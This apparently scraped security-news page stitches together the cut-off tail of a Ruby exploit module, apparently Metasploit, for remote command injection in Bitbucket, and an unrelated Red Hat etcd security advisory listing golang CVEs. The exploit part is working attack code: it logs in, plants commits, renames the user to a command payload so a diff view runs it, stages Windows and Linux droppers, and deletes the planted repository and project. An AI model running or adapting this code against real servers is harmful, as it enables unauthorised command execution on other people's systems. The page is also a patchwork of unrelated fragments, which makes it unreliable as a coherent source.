'Git responded with an error') if res.body.include?('error:')    fail_with(Failure::UnexpectedReply, 'Git push failed') unless res.body.include?('unpack ok')    [ new_commit.sha1, commit_obj.sha1, new_file ]  end  def get_user_id(curr_uname)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'admin/users/view'),      'vars_get' => { 'name' => curr_uname }    )    matched_id = res.get_html_document&.xpath("//script[contains(text(), '\"name\":\"#{curr_uname}\"')]")&.first&.text&.match(/"id":(\d+)/)    fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1    matched_id[1]  end  def change_username(curr_uname, new_uname)    @user_id ||= get_user_id(curr_uname)    headers = {      'X-Requested-With' => 'XMLHttpRequest',      'X-AUSERID' => @user_id,      'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}"    }    vars = {      'name' => curr_uname,      'newName' => new_uname    }.to_json    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/admin/users/rename'),      'ctype' => 'application/json',      'keep_cookies' => true,      'headers' => headers,      'data' => vars    )    unless res      print_bad('Did not receive a response to the user name change request')      return false    end    unless res.body.include?(new_uname) || res.body.include?('GIT_EXTERNAL_DIFF')      print_bad('User name change was unsuccessful')      return false    end    true  end  def commit_uri(project_key, repo_name, commit_sha)    normalize_uri(      target_uri.path,      'rest/api/latest/projects',      project_key,      'repos',      repo_name,      'commits',      commit_sha    )  end  def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file)    commit_diff_uri = normalize_uri(      commit_uri(@project_key, @repo_name, latest_commit_sha),      'diff',      diff_file    )    send_request_cgi(      'method' => 'GET',      'uri' => commit_diff_uri,      'keep_cookies' => true,      'vars_get' => { 'since' => first_commit_sha }    )  end  def delete_repository(username)    vprint_status("Attempting to delete repository '#{@repo_name}'")    repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos', @repo_name.downcase)    res = send_request_cgi(      'method' => 'DELETE',      'uri' => repo_uri,      'keep_cookies' => true,      'headers' => {        'X-AUSERNAME' => username,        'X-AUSERID' => @user_id,        'X-Requested-With' => 'XMLHttpRequest',        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",        'ctype' => 'application/json',        'Accept' => 'application/json, text/javascript'      }    )    unless res&.body&.include?('scheduled for deletion')      print_warning('Failed to delete repository')      return    end    print_good('Repository has been deleted')  end  def delete_project(username)    vprint_status("Now attempting to delete project '#{@project_name}'")    send_request_cgi( # fails to return a response      'method' => 'DELETE',      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),      'keep_cookies' => true,      'headers' => {        'X-AUSERNAME' => username,        'X-AUSERID' => @user_id,        'X-Requested-With' => 'XMLHttpRequest',        'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",        'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/projects/#{@project_key}/settings",        'ctype' => 'application/json',        'Accept' => 'application/json, text/javascript, */*; q=0.01',        'Accept-Encoding' => 'gzip, deflate'      }    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'projects', @project_key),      'keep_cookies' => true    )    unless res&.code == 404      print_warning('Failed to delete project')      return    end    print_good('Project has been deleted')  end  def get_repo    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),      'keep_cookies' => true    )    unless res      print_status('Couldn\'t access repos page. Will create repo')      return []    end    json_data = JSON.parse(res.body)    unless json_data && json_data['size'] >= 1      print_status('No accessible repositories. Will attempt to create a repo')      return []    end    repo_data = json_data['values'].first    repo_name = repo_data['slug']    project_key = repo_data['project']['key']    unless repo_name && project_key      print_status('Could not find repo name and key. Creating repo')      return []    end    [ repo_name, project_key ]  end  def get_repo_info    unless @project_name && @project_key      print_status('Failed to find valid project information. Will attempt to create repo')      return nil    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri('projects', @project_key, 'repos', @project_name, 'commits'),      'keep_cookies' => true    )    unless res      print_status("Failed to access existing repository #{@project_name}")      return nil    end    html_doc = res.get_html_document    commit_data = html_doc.search('a[@class="commitid"]')    unless commit_data && commit_data.length > 1      print_status('No commits found for existing repo')      return nil    end    latest_commit = commit_data[0]['data-commitid']    prev_commit = commit_data[1]['data-commitid']    file_uri = normalize_uri(commit_uri(@project_key, @project_name, latest_commit), 'changes')    res = send_request_cgi(      'method' => 'GET',      'uri' => file_uri,      'keep_cookies' => true    )    return nil unless res    json = JSON.parse(res.body)    return nil unless json['values']    path = json['values']&.first&.dig('path')    return nil unless path    [ latest_commit, prev_commit, path['name'] ]  end  def exploit    @use_public_repo = true    datastore['GIT_USERNAME'] = datastore['USERNAME']    datastore['GIT_PASSWORD'] = datastore['PASSWORD']    if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?      fail_with(Failure::BadConfig, 'No credentials to log in with.')    end    log_in(datastore['USERNAME'], datastore['PASSWORD'])    @curr_uname = datastore['USERNAME']    @project_name, @project_key = get_repo    @repo_name = @project_name    @latest_commit, @first_commit, @diff_file = get_repo_info    unless @latest_commit && @first_commit && @diff_file      @use_public_repo = false      @project_name, @project_key = create_project      email, @repo_name = create_repository      @latest_commit, @first_commit, @diff_file = create_commits(email)      print_good("Commits added: #{@first_commit}, #{@latest_commit}")    end    print_status('Sending payload')    case target['Type']    when :win_dropper      execute_cmdstager(linemax: target['MaxLineChars'] - uname_payload('cmd.exe /c ').length, noconcat: true, temp: '.')    when :linux_dropper      execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true)    when :unix_cmd      execute_command(payload.encoded.strip)    end  end  def cleanup    if @curr_uname != datastore['USERNAME']      print_status("Changing user name back to '#{datastore['USERNAME']}'")      if change_username(@curr_uname, datastore['USERNAME'])        @curr_uname = datastore['USERNAME']      else        print_warning('User name is still set to payload.' \                      "Please manually change the user name back to #{datastore['USERNAME']}")      end    end    unless @use_public_repo      delete_repository(@curr_uname) if @repo_name      delete_project(@curr_uname) if @project_name    end  end  def execute_command(cmd, _opts = {})    if target['Platform'] == 'win'      curr_payload = (cmd.ends_with?('.exe') ? uname_payload("cmd.exe /c #{cmd}") : uname_payload(cmd))    else      curr_payload = uname_payload(cmd)    end    unless change_username(@curr_uname, curr_payload)      fail_with(Failure::UnexpectedReply, 'Failed to change user name to payload')    end    view_commit_diff(@latest_commit, @first_commit, @diff_file)    @curr_uname = curr_payload  endend

Bitbucket Environment Variable Remote Command Injection

Red Hat Security Advisory 2023-1275-01 - An update for etcd is now available for Red Hat OpenStack Platform. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (etcd) security update  
Advisory ID:       RHSA-2023:1275-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1275  
Issue date:        2023-03-15  
CVE Names:         CVE-2022-1705 CVE-2022-2880 CVE-2022-3064   
                   CVE-2022-27664 CVE-2022-30629 CVE-2022-30630   
                   CVE-2022-30632 CVE-2022-30635 CVE-2022-32148   
                   CVE-2022-32189 CVE-2022-41715 CVE-2022-41717   
=====================================================================

1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - ppc64le, x86_64  
Red Hat OpenStack Platform 16.2 - ppc64le, x86_64

3. Description:

etcd is a highly-available key value store for shared configuration.

The following Important impact security fix(es) are applicable to Red Hat  
OpenStack Platform 17.0 (Wallaby), 16.2 (Train), and 16.1 (Train):

* Improve heuristics preventing CPU/memory abuse by parsing malicious or  
large YAML documents (CVE-2022-3064)

As a result of being built by golang 1.18.9, the following Moderate impact  
security fix(es) are applicable to Red Hat OpenStack Platform 16.2 and  
16.1:

* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)  
* golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)  
* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)  
* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)  
* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)  
* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)  
* golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For not working (CVE-2022-32148)  
* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)  
* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

As a result of being built by golang 1.18.9, the following Low impact  
security fix(es) are applicable to Red Hat OpenStack Platform 16.2 and  
16.1:

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)  
* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests  
2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
etcd-3.3.23-12.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-12.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-12.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-12.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-12.el8ost.x86_64.rpm

Red Hat OpenStack Platform 16.2:

Source:  
etcd-3.3.23-12.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-12.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-12.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-12.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-12.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-3064  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBI1RdzjgjWX9erEAQhiMQ//RoGIYCEpQVateDyWCzgK994AwibDtJsY  
oItePquSjOfG7TpqVfJz7W2Ss9LRpvH2/LtYx+7U1YRDWBfDp5QaU3Lkam+uy1dy  
DKNtkOcWOFZm48f3w6BJkeRmQgahkTZCa+b/Em7+MgCR+Aw2R0ish30j9UOac/8v  
aOZ66hulCl6dw2WmKBYFxtK6KI8/MW7N9bNM13Jmhi+EsHNMC5r5rvGz5hQIKDxp  
i0ax5bRWcVGyET4RYbEMxhVvOJzwdHLNEA4MnzWvylKU017V69EnMPdHZC0ByU8Q  
4rxwAKmA5TKxe5u1Dj8pwWIoY0XWIQ92o5JhGyclA+f02E1OSqpcT/Jx61oUtUJ4  
SyQioPflFQS96no+JW33/Pb7HHB/CtQA/W7HgiC5le4FjrB9/UPuleqf7asxe8Up  
HwuGD8twgr9K98Ek/+F/90l0AkuhwL6NrXd4Un/o/yfrmzMGGgfCFLW4uCOpNYtS  
+RgPKWOhrM0V8YGchKwRgedRooecPGwzx2nDYtLp08t/iNCcDIaoA9lYk6jmmYDN  
fs+YWixNNMuDpHGYhwkanFlQ3DTC6AGgXkXVfErBLAewq/ffAyuBi321kxj1YI8e  
D3auvxSY3hzmwtjUExAo2gyIBl6tIilOaJpP/OmekpPza1W8yzqglhoThU8eF/F+  
HhBZ5kVrN8E=  
=O/n4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js